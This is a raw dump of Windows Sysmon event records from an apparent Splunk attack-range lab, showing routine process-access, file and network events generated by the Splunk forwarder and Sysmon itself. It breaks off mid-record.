11:00:47.403{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE9834BDFDFA8F800B9945FB918F8AF2,SHA256=CD8FFE90EA651F583190AB74D62817B2AEC8DC267EC016E48B89C98304003645,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:45.722{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53856-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:47.252{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF30F5BE1BF0D7A0DAD36D6F93E378E1,SHA256=34BA61414C8456687F064637394C755ECA41D7E785BDE5DA8C3D404E67175F8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13DF-6216-A104-000000003902}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-13DF-6216-A104-000000003902}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.231{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13DF-6216-A104-000000003902}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:47.232{4F8D34B0-13DF-6216-A104-000000003902}2888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:48.419{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70487A14EB852D736C2D8F55F7F08B1B,SHA256=7B0C6BE408EE70D5311DF2D2E72C7D35B761E253D4EA9462898BE69315C3AF43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:48.268{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43BAB4471B8510B3002DF2D679949A54,SHA256=D99BEF376C76C6BA32677E3FE987BFDE167BCF33B93D3851A54F5914DF980E10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:48.279{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BAE34B7C7638822D37697EC01A1B3C3,SHA256=9BEE40772AF1FF0F3F3DBB5B06EC1625D749A21D658CBFCD3EA8F3F5650F6206,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13E1-6216-A404-000000003902}3520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:49.918{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 